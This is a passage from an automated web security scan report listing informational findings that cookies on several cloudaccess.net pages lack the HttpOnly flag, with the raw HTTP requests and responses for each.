Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 29 Sep 2010 20:40:16 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.707. http://www.cloudaccess.net/joomla-templates-and-themes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-templates-and-themes.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-templates-and-themes.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Fri, 31 Dec 2010 05:10:22 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.708. http://www.cloudaccess.net/joomla-training-videos.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-training-videos.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-training-videos.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Fri, 14 Jan 2011 20:36:34 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.709. http://www.cloudaccess.net/meet-our-team.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /meet-our-team.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /meet-our-team.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:54 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:37:23 GMT
Expires: Mon, 24 Jan 2011 14:07:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.710. http://www.cloudaccess.net/network-report.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /network-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.711. http://www.cloudaccess.net/network-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /network-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:51 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:52 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:51 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 14:07:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.712. http://www.cloudaccess.net/pricing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /pricing.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pricing.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Sat, 22 Jan 2011 06:20:15 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.713. http://www.cloudaccess.net/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
